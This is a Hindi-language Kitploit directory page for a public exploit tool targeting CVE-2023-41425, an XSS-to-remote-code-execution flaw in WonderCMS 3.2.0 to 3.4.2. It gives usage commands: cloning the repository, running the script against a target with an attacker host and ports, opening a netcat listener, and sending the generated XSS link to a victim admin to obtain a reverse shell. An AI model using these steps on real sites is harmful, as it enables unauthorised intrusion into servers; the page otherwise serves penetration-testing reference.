Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-41425-wonderCMS_RCE — CVE-2023-41425 - Wonder CMS v.3.2.0 से v.3.4.2 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को installModule घटक पर अपलोड की गई एक क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/thefizzyfish/cve-2023-41425-wondercms_rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubthefizzyfish/cve-2023-41425-wondercms_rce

CVE-2023-41425-wonderCMS_RCE

CVE-2023-41425 - Wonder CMS v.3.2.0 से v.3.4.2 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को installModule घटक पर अपलोड की गई एक क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2023-41425-wonderCMS_RCE

Wonder CMS v.3.2.0 से v.3.4.2 में क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को installModule घटक पर अपलोड की गई एक क्राफ्टेड स्क्रिप्ट के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है। केवल शैक्षिक उद्देश्यों के लिए

इसके लिए loginURL का ज्ञान, एडमिन एक्सेस या एडमिन को XSS लिंक पर क्लिक करवाने की क्षमता आवश्यक है।

  1. रिपॉजिटरी क्लोन करें
root@kitploit:~
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
  1. इसे चलाएँ
root@kitploit:~
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
  1. स्थानीय लिसनर सेट करें
root@kitploit:~
nc -lnvp 9001
  1. प्रिंट किए गए XSS URL को पीड़ित को भेजें या यदि आपके पास एडमिन एक्सेस है तो उस पर क्लिक करें
  2. कॉलबैक की प्रतीक्षा करें

image

श्रेय

भेद्यता की खोज और रिपोर्ट करने के लिए prodigiousMind

https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
टूल डाउनलोड करें